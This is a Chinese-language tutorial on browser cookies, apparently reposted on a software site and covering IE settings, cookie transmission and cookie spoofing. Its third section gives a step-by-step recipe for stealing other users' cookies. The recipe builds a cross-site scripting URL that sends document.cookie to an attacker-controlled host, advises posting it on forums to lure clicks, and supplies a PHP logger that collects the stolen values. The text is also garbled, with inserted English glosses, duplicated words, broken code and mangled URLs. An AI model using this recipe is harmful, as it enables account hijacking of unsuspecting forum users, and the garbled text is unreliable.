Cookie在英文中是小甜品的意思,而不能是这一个词我们总能在浏览器中看到,食品怎么会跟浏览器扯上关系呢?在您浏览以前登陆过的网站时可能会在网页中出现:您好XX,感觉很亲切,就好好像是吃了一个小甜品一样.这当然是通过访问您主机里边的一个文件来实现的,所以我们可以得出结论这一个文件也就被称为了Cookie.想全面了解Cookie吗?看看下文吧!
一.了解Cookie 适用对像:初级读者
Cookie是当您浏览某网站时,网站存储在您机器上的一个小文本文件,他记录了您的用户ID,密码,浏览过的网页,停留的时间等信息,当您再一次来到该网站时,网站通过读取Cookie,得知您的相关信息,就可以做出相应的动作,如在页面显示欢迎您的标语,或者是让您不用输入ID,密码就直接或者间接登录(Logon)等等.您可以在IE的“工具/Internet选项”的“常规”选项卡中,选择(Choose)“设置/查看文件”,查看所有保存到您电脑里面的Cookie.这些文件通常是以user@domain格式命名的,user是您的本地用户名,domain是所访问的网站的域名.如果您使用NetsCape浏览器,则存放在“C:\PROGRAMFILES\NETSCAPE\USERS\”里面,与IE不相同的是,NETSCAPE是使用一个Cookie 文件记录所有网站的Cookies.
为了保证上网安全我们需要对Cookie进行适当设置.打开“工具/Internet选项”中的“隐私”选项卡(注意该设置只在IEVI.0中存在,其他版本IE可以在“工具/Internet选项”的“安全”标签当中单击“自定义级别”按钮,进行简单调整),调整Cookie的安全级别.通常情况,可以将滑块调整到“中高”或者是“高”的位置.多数的论坛站点需要使用Cookie信息,如果您从来不去这些地方,可以将安全级调到“阻止所有Cookies”.如果只是为了禁止个别网站的Cookie,可以单击“Editor”按钮,将要屏蔽的网站添加到列表中.在“高级”按钮选项中,您可以对第一方Cookie和第三方的Cookie进行设置,第一方Cookie是您正在浏览的网站的Cookie,第三方Cookie非正在浏览的网站发给您的Cookie,通常要对第三方Cookie选择(Choose)“拒绝”,如图1.您如果需要保存Cookie,可以使用IE的“导入导出”功能,打开“文件/导入导出”,按提示操作就可以了.
Cookie中的内容大多数经过了加密处理,所以我们可以得出结论在我们看来只是一些毫无意义的字母数字组合,只有服务器(Server)的CGI处理程序(Procedures)(Procedures)才知道他们真正的含义.通过一些软件(soft)我们可以查看到更多的内容,使用Cookie Pal软件(soft)查看到的Cookie信息,如图2所示.他为我们提供了Server,Expires,Name,value等选项的内容.当中,Server是存储Cookie的网站,Expires记录了Cookie的时间和生命期,Name和value字段则是具体的数据(Data)(本报第10期第42版对该软件(soft)有非常非常详细介绍).
原始的下载地址(由于来源于网上,本站不确保能否下下来):http://www.cbifamily.com/down/200411/cfnetwork/cpI.exe.
II.Cookie的传递流程 适用对像:中级读者
当在浏览器地址栏中键入了一个Web站点的URL,浏览器会向该Web站点发送一个读取网页的请求,并将结果在显示器上显示.这时该网页在您的电脑上寻找Amazon网站设置的Cookie文件,如果找到,浏览器会把Cookie文件中的数据(Data)连同前面输入的URL一同发送到Amazon服务器(Server).服务器(Server)收到Cookie数据(Data),就会在他的数据(Data)库中检索您的ID,您的购物记录,个人喜好等信息,并记录下新的内容,增加到数据(Data)库和Cookie文件中去.如果没有检测到Cookie或者是您的Cookie信息与数据(Data)库中的信息不符合,则说明您是第一次浏览该网站,服务器(Server)的CGI程序(Procedures)(Procedures)将为您创建新的ID信息,并保存到数据(Data)库中.
Cookie是利用了网页代码中的HTTP头信息进行传递的,浏览器的每一次网页请求,都可以伴随Cookie传递,比如说是,浏览器的打开或者是刷新网页操作.服务器(Server)将Cookie添加到网页的HTTP头信息中,伴随网页数据(Data)传回到您的浏览器,浏览器会根据您电脑中的Cookie设置选择(Choose)是否保存这些数据(Data).如果浏览器不允许Cookie保存,则关掉浏览器后,这些数据(Data)就突然之间就消失.Cookie在电脑上保存的时间是不一样的,这些绝大部分的都是由服务器(Server)的设置不同决定得.Cookie有一个Expires(有效期)属性,这一个属性决定了Cookie的保存时间,服务器(Server)可以通过设定Expires字段的数值,来改变Cookie的保存时间.如果不设置该属性,那么Cookie只在浏览网页期间有效,关闭浏览器,这些Cookie自动突然之间就消失,绝大多数网站属于这种情况.通常情况下,Cookie包含Server,Expires,Name,value这几个字段,当中对服务器(Server)有用的只是Name和value字段,Expires等字段的内容仅仅是为了告诉浏览器如何处理这些Cookies.
III.Cookie的编程实现 适用对像:高级读者
多数网页编程语言(Language)都提供了对Cookie的支持.如javascript,VBScript,Delphi,ASP,SQL,PHP,C#等.在这些面向对像的编程语言(Language)中,对Cookie的编程利用基本上是相似的,大体过程为:先创建一个Cookie对像(Object),然后利用控制函数对Cookie进行赋值,读取,写入等操作.那么如何通过代码来获取其他用户Cookie中的敏感信息?下面进行简单的介绍.
该方法主要有两步,最开始要定位您需要收集Cookie的网站,并对其进行分析,并构造URL;然后编制收集Cookie的PHP代码,并将其放到您可以控制的网站上,当不知情者单击了您构造的URL后可以执行该PHP代码.下面我们看具体的实现过程.
I.分析并构造URL
最开始打开我们要收集Cookie的网站,这里假设是http://www.XXX.net,登陆网站输入用户名“”(不含引号),对数据(Data)进行分析抓包,得到形如“http://www.XXX.net/txl/login/login....x=28&ok.y=6”的代码,将“”更换为“”再试;如果执行成功,就开始构造URL:“http://www.cbifamily.org/cbi.php?\"%2Bdocuments.cookie)&passwd=&ok.x=28&ok.y=6" target="_blank">http://www.XXX.net/txl/login/log ... swd=&ok.x=28&ok.y=6”.当中http:///www.cbifamily.org/cbi.php就是您能够控制的某台主机上的一个脚本.需要注意的是“%2B”为符号“+”的URL编码,因为“+”将被作为空格处理.该URL就可以在论坛中发布,诱使别人单击了.
II.编制PHP脚本
该脚本的作用就是收集Cookie文件,具体内容如下:
$info =getenv("QUERY_STRING";
if ($info) {
$fp =fopen("info.txt","a";
fwrite($fp,$info."\n";
fclose($fp);
}
header("Location: http://www.XXX.net\";
?>
IV.Cookie的安全问题 适用对像:所有希望上网安全的读者
I.Cookie欺骗
Cookie记录着用户的帐户ID,密码之类的信息,如果在网上传递,通常使用的是MD5方法加密.这样经过加密处理后的信息,即使被网络上一些别有用心的人截获,也看不懂,因为他看到的只是一些无意义的字母和数字.然而不能是,现在碰到的基本问题是,截获Cookie的人不需要知道这些字符串的含义,他们只要把别人们的Cookie向服务器(Server)提交,并且能够通过验证,他们就可以冒充受害人们的身份,登陆网站.这种方法叫做Cookie欺骗.Cookie欺骗实现的前提条件是服务器(Server)的验证程序(Procedures)(Procedures)存在漏洞,并且冒充者要获得被冒充的人们的Cookie信息.目前网站的验证程序(Procedures)(Procedures)要排除所有非法登录(Logon)是非常困难的,比如说是,编写验证程序(Procedures)(Procedures)使用的语言(Language)可能存在漏洞.而不能是且要获得别人Cookie是很容易的,用支持Cookie的语言(Language)编写一小段代码就可以实现(具体方法见三),只要把这段代码放到网络里,那么所有人们的Cookie都能够被收集.如果一个论坛允许HTML代码或者是允许使用Flash标签就可以利用这些技术收集Cookie的代码放到论坛里,然后给帖子取一个吸引人们的主题,写上有趣的内容,很快就可以收集到大量的Cookie.在论坛上,有许多个人们的密码就被这种方法盗去的.至于如何防范,目前还没有特效药,我们也只能使用通常的防护方法,不要在论坛里使用重要的密码,也不要使用IE自动保存密码的功能,以及尽量不登陆不了解底细的网站.
II.Flash的代码隐患
Flash中有一个getURL()函数,Flash可以利用这一个函数自动打开指定的网页.所以我们可以得出结论他可能把您引向一个包含恶意代码的网站.打个比方,当您可以在自己电脑上欣赏精美的Flash动画时,动画帧里面的代码可能已经悄悄地连上网,并打开了一个极小的包含有特殊代码的页面.这一个页面可以收集您的Cookie,也可以做一些其他的事情,譬如在您的机器上种植令人讨厌的电脑木马还超级有可能格式化您的计算机硬盘(Hard)等等.对于Flash的这种行为,网站是根本没有办法禁止的,因为这是Flash文件的内部行为.我们所能做到的,如果是在本地浏览尽量打开防火墙(本站在极力推荐使用瑞星防火墙,如何使用在本站的反毒杀毒里有详细的介绍),如果防火墙(本站在极力推荐使用瑞星防火墙,如何使用在本站的反毒杀毒里有详细的介绍)提示的向外发送的数据(Data)包并不为您知悉,最好禁止.如果是在Internet上欣赏,最好找一些著名的大网站.
var tagarray =['软件(soft)','网络','工具','操作操作系统','
网吧','电脑','破解','服务器(Server)','VPN','(路由器的缩写)器(局域网中常用的一种设备,可以很好的防止Arp病毒)'];var tagencarray =['%C8%ED%BC%FE','%CD%F8%C2%E7','%B9%A4%BE%DF','%CF%B5%CD%B3','%CD%F8%B0%C9','%B5%E7%C4%D4','%C6%C6%BD%E2','%B7%FE%CE%F1%C6%F7','VPN','%C2%B7%D3%C9%C6%F7'];parsetag(1344952);
